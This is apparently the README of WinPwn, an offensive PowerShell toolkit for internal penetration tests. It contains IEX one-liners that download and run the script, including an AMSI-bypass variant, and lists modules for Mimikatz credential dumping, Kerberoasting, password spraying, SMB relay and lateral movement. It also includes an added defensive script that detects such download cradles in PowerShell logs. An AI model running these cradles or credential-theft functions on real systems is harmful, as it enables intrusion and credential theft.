In many past internal penetration tests I often had problems with the existing PowerShell recon/exploitation scripts due to missing proxy support. I often ran the same scripts one after the other to get information about the current system and/or the domain. To automate as many internal penetration test processes (reconnaissance as well as exploitation) as possible, and for the proxy reason, I wrote my own script with automatic proxy recognition and integration. The script is mostly based on well-known large offensive security PowerShell projects. They are loaded into RAM via IEX DownloadString.
Any suggestions, feedback, Pull requests and comments are welcome!
Just import the modules with:
Import-Module .\WinPwn.ps1
or
iex (new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/master/WinPwn.ps1')
For AMSI bypass use the following one-liner:
iex (new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/master/ObfusWinPwn.ps1')
If you find yourself stuck on a Windows system with no internet access, no problem at all: just use Offline_Winpwn.ps1, all scripts and executables are included.
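The loading method above (an IEX download cradle fetching the script straight into memory) is also what a defender looks for in PowerShell Script Block Logging. The following is an added example, not part of WinPwn: it flags cradle patterns in constructed sample script block text such as Event ID 4104 would record; the function name and the sample lines are assumptions for this example.

```powershell
# Added example (not WinPwn code): detect PowerShell download cradles of the kind used
# to load this script, as they appear in Script Block Logging (Event ID 4104).
# The sample script block texts below are constructed for this example; the last URL
# is a placeholder, not a real staging host.
$SampleScriptBlocks = @(
    "iex (new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/master/WinPwn.ps1')",
    "Import-Module .\WinPwn.ps1",
    "Get-ChildItem C:\Users | Select-Object Name",
    "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/master/ObfusWinPwn.ps1')",
    "Invoke-Expression (Invoke-WebRequest -Uri 'http://example.invalid/stage.ps1' -UseBasicParsing).Content"
)

function Find-DownloadCradle {
    # Hypothetical helper: returns one record per script block that combines an
    # in-memory execution primitive with a web download primitive.
    param([string[]]$ScriptBlockText)

    # -match is case-insensitive by default, so obfuscated casing is covered.
    $execute  = '\biex\b|invoke-expression'
    $download = 'net\.webclient|downloadstring|downloadfile|invoke-webrequest|invoke-restmethod|\biwr\b|\birm\b'

    foreach ($text in $ScriptBlockText) {
        if ($text -match $execute -and $text -match $download) {
            # Extract the first URL so the analyst sees where the stage was fetched from.
            $url = if ($text -match 'https?://[^''"\s)]+') { $Matches[0] } else { $null }
            [pscustomobject]@{
                Rule = 'PowerShell download cradle (execute + web download)'
                Url  = $url
                Text = $text
            }
        }
    }
}

# Expected: the three cradle lines are reported; Import-Module and Get-ChildItem are not.
Find-DownloadCradle -ScriptBlockText $SampleScriptBlocks | Format-Table -AutoSize
```

On a live host, feed the function the ScriptBlockText of real 4104 events, for example `Get-WinEvent -FilterHashtable @{LogName='Microsoft-Windows-PowerShell/Operational'; Id=4104} | ForEach-Object { $_.Properties[2].Value }`; a hit is a lead for review, not proof of compromise, since the same cradle is used by legitimate install scripts.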
Functions available after import:
WinPwn
-> Menu to choose attacks
Inveigh
-> Executes Inveigh in a new console window, SMB relay attacks with session management (Invoke-TheHash) integrated
sessionGopher
-> Executes SessionGopher, asking you for parameters
kittielocal
->
- Obfuscated Invoke-Mimikatz version
- Safetykatz in memory
- Dump lsass using rundll32 technique
- Download and run LaZagne
- Dump browser credentials
- Extract juicy information from memory
- Exfiltrate Wi-Fi credentials
- Dump SAM file NTLM hashes
localreconmodules
->
- Collect installed software, vulnerable software, shares, network information, groups, privileges and many more
- Check typical vulns like SMB signing, LLMNR poisoning, mitm6, WSUS over HTTP
- Check the PowerShell event logs for credentials or other sensitive information
- Search for passwords in the registry and on the file system
- Find sensitive files (config files, RDP files, KeePass databases)
- Search for .NET binaries on the local system
- Optional: Get-ComputerDetails (PowerSploit) and PSRecon
domainreconmodules
->
- Collect various domain information for manual review
- Find AD passwords in description fields
- Search for potentially sensitive domain share files
- ACL analysis
- Unconstrained delegation systems/users are enumerated
- MS17-10 scanner for domain systems
- SQL Server discovery and auditing functions (default credentials, passwords in the database and more)
- MS-RPRN check for domain controllers
- Group Policy audit with Grouper2
- An AD report is generated in CSV files (or XLS if Excel is installed) with ADRecon
Privescmodules
-> Executes different privesc scripts in memory (PowerUp AllChecks, Sherlock, GPPPasswords)
latmov
-> Searches for systems with admin access in the domain for lateral movement. Mass-Mimikatz can be used afterwards on the found systems
shareenumeration
-> Invoke-FileFinder and Invoke-ShareFinder (PowerView / PowerSploit)
groupsearch
-> Get-DomainGPOUserLocalGroupMapping: find systems where you have admin access or RDP access via Group Policy mapping (PowerView / PowerSploit)
Kerberoasting
-> Executes Invoke-Kerberoast in a new window and stores the hashes for later cracking
powerSQL
-> SQL Server discovery, check access with the current user, audit for default credentials + UNC path injection attacks
Sharphound
-> Downloads SharpHound and collects information for the BloodHound DB
adidnswildcard
-> Creates an Active Directory-integrated DNS wildcard record
MS17-10
-> Scans active Windows servers in the domain or all systems for the MS17-10 (EternalBlue) vulnerability
Sharpcradle
-> Loads C# files from a remote web server into RAM
DomainPassSpray
-> DomainPasswordSpray attacks, one password for all domain users
TO-DO
- Some obfuscation
- More obfuscation
- Proxy via PAC-File support
- Get the scripts from my own creds repository (https://github.com/S3cur3Th1sSh1t/Creds) to be independent from changes in the original repositories
- More Recon/Exploitation functions
- Add MS17-10 Scanner
- Add menu for better handling of functions
- Amsi Bypass
- Mailsniper integration
- Azure Checks / Modules integration
CREDITS
- Kevin-Robertson - Inveigh, Powermad, Invoke-TheHash
- Arvanaghi - SessionGopher
- PowerShellMafia - Powersploit
- Dionach - PassHunt
- A-mIn3 - WINSpect
- 411Hall - JAWS
- sense-of-security - ADrecon
- dafthack - DomainPasswordSpray
- rasta-mouse - Sherlock
- AlessandroZ - LaZagne
- samratashok - nishang
- leechristensen - Random Repo
- HarmJ0y - Many good Blogposts, Gists and Scripts
- NETSPI - PowerUpSQL
- Cn33liz - p0wnedShell
- rasta-mouse - AmsiScanBufferBypass
- l0ss - Grouper2
- enjoiz - PrivEsc